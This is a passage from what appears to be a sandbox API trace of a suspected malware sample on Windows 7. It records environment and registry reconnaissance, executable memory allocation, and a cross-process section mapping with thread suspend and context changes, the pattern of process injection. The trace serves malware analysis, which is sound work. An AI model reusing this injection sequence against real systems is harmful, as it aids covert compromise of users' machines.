dwThreadId=0xef0), hNewToken=0x0) returned 1 [0131.875] NtWaitForSingleObject (Object=0xe8, Alertable=0, Time=0x0) returned 0x0 [0135.006] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x19e944 | out: Value="C:\\Program Files (x86)") returned 0x0 [0135.391] SetErrorMode (uMode=0x8003) returned 0x1 [0135.394] NtCreateSection (in: SectionHandle=0x19ecd0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19ea4c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19ecd0*=0xf0) returned 0x0 [0135.397] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x19ecd4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ea4c*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ecd4*=0x120000, SectionOffset=0x0, ViewSize=0x19ea4c*=0x2f000) returned 0x0 [0135.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea44*=0x0, ZeroBits=0x0, RegionSize=0x19ea48*=0x2e200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ea44*=0x1a0000, RegionSize=0x19ea48*=0x2f000) returned 0x0 [0135.407] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x2000) returned 0x41d660 [0135.408] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e788 | out: TokenHandle=0x19e788*=0xec) returned 0x0 [0135.432] NtQueryInformationToken (in: TokenHandle=0xec, TokenInformationClass=0x1, TokenInformation=0x19df80, TokenInformationLength=0x400, ReturnLength=0x19e780 | out: TokenInformation=0x19df80, ReturnLength=0x19e780) returned 0x0 [0135.433] ConvertSidToStringSidW (in: Sid=0x19df88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x19e784 | out: StringSid=0x19e784*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0135.433] NtClose (Handle=0xec) returned 0x0 [0135.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e9f8*=0x0, ZeroBits=0x0, RegionSize=0x19e9fc*=0x92f26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e9f8*=0x930000, RegionSize=0x19e9fc*=0x93000) returned 0x0 [0135.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e9e4*=0x0, ZeroBits=0x0, RegionSize=0x19e9e8*=0x92f26, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e9e4*=0x9d0000, RegionSize=0x19e9e8*=0x93000) returned 0x0 [0135.447] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x41d660) returned 1 [0135.447] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1000) returned 0x41d660 [0135.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0135.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0xc0000004 [0135.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19ea88, FreeType=0x8000) returned 0x0 [0135.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea50*=0x0, ZeroBits=0x0, RegionSize=0x19ea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea50*=0x1d0000, RegionSize=0x19ea54*=0x20000) returned 0x0 [0135.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1d0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1d0000, ResultLength=0x0) returned 0x0 [0135.467] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19e10c | out: Value="kEecfMwgj") returned 0x0 [0135.467] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x19e478 | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0135.467] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x19e490 | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0135.467] NtCreateSection (in: SectionHandle=0x19fac0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e4c8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fac0*=0xec) returned 0x0 [0135.467] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xffffffff, BaseAddress=0x19fabc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e4c8*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fabc*=0x2390000, SectionOffset=0x0, ViewSize=0x19e4c8*=0x9c4000) returned 0x0 [0135.468] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x4000) returned 0x41e668 [0135.468] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19dc2c | out: TokenHandle=0x19dc2c*=0xf4) returned 0x0 [0135.468] NtQueryInformationToken (in: TokenHandle=0xf4, TokenInformationClass=0x1, TokenInformation=0x19d424, TokenInformationLength=0x400, ReturnLength=0x19dc24 | out: TokenInformation=0x19d424, ReturnLength=0x19dc24) returned 0x0 [0135.468] ConvertSidToStringSidW (in: Sid=0x19d42c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x19dc28 | out: StringSid=0x19dc28*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0135.468] NtClose (Handle=0xf4) returned 0x0 [0135.478] RtlIntegerToChar (in: Value=0x25ba05, Base=0x10, Length=0x20, String=0x239649d | out: String="25BA05") returned 0x0 [0135.480] NtCreateKey (in: KeyHandle=0x19e6a0, DesiredAccess=0x20219, ObjectAttributes=0x19dc2c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e6a0*=0xf4) returned 0x0 [0135.483] NtQueryValueKey (in: KeyHandle=0xf4, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0x19e278, Length=0x100, ResultLength=0x19e6f4 | out: KeyValueInformation=0x19e278*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x2e, NameLength=0x16, Name="ProductName", Data="Windows 7 Professional"), ResultLength=0x19e6f4) returned 0x0 [0135.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19dc5c*=0x0, ZeroBits=0x0, RegionSize=0x19dc60*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19dc5c*=0x2d60000, RegionSize=0x19dc60*=0x1f5000) returned 0x0 [0135.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19dc48*=0x0, ZeroBits=0x0, RegionSize=0x19dc4c*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19dc48*=0x2f60000, RegionSize=0x19dc4c*=0x1f5000) returned 0x0 [0135.484] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0x19dc4c | out: Value="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0 [0135.487] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x19dc14 | out: Value="C:\\Program Files (x86)") returned 0x0 [0135.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8f2b9, lpParameter=0x19f2e4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0135.824] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1000) returned 0x422670 [0135.826] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xfc) returned 0x0 [0135.827] NtQueryInformationProcess (in: ProcessHandle=0xfc, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0135.827] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xfc, BaseAddress=0x19ea60*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ea5c*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19ea60*=0x8cc0000, SectionOffset=0x0, ViewSize=0x19ea5c*=0x9c4000) returned 0x0 [0135.828] NtClose (Handle=0xfc) returned 0x0 [0135.830] NtDelayExecution (Alertable=0, Interval=0x19e6bc*=-50000000) returned 0x0 [0141.158] NtOpenProcess (in: ProcessHandle=0x19e678, DesiredAccess=0x438, ObjectAttributes=0x19dc28*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19dc68*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x19e678*=0x104) returned 0x0 [0141.162] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19dc78, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19dc78, ReturnLength=0x0) returned 0x0 [0141.170] NtOpenThread (in: ThreadHandle=0x19dc20, DesiredAccess=0x1a, ObjectAttributes=0x19dc28, ClientId=0x19dc58*(UniqueProcess=0x0, UniqueThread=0x460) | out: ThreadHandle=0x19dc20*=0x100) returned 0x0 [0141.176] NtSuspendThread (in: ThreadHandle=0x100, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0141.183] NtGetContextThread (in: ThreadHandle=0x100, Context=0x19e170 | out: Context=0x19e170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x63, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x28, [73]=0x22, [74]=0xc5, [75]=0x8, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x12f0d0, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x12f0d1, SegCs=0x0, EFlags=0x8c5222a, Esp=0x0, SegSs=0x16, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf0, [5]=0xef, [6]=0x12, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x3a, [45]=0x93, [46]=0x5f, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.233] NtCreateSection (in: SectionHandle=0x19dc00, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19dba0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19dc00*=0x108) returned 0x0 [0141.236] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x104, BaseAddress=0x19dc08*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19dba8*=0xdff26, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19dc08*=0x2520000, SectionOffset=0x0, ViewSize=0x19dba8*=0xe0000) returned 0x0 [0141.243] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffffffffffff, BaseAddress=0x19dbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19dba8*=0xe0000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19dbf8*=0xb50000, SectionOffset=0x0, ViewSize=0x19dba8*=0xe0000) returned 0x0 [0141.320] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0xb50000) returned 0x0 [0141.360] NtClose (Handle=0x108) returned 0x0 [0141.365] NtSetContextThread (ThreadHandle=0x100, Context=0x19e170*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x63, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x28, [73]=0x22, [74]=0xc5, [75]=0x8, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x12f0d0, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x12f0d1, SegCs=0x0, EFlags=0x8c5222a, Esp=0x0, SegSs=0x16, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf0, [5]=0xef, [6]=0x12, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0xad, [46]=0x57, [47]=0x2, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, 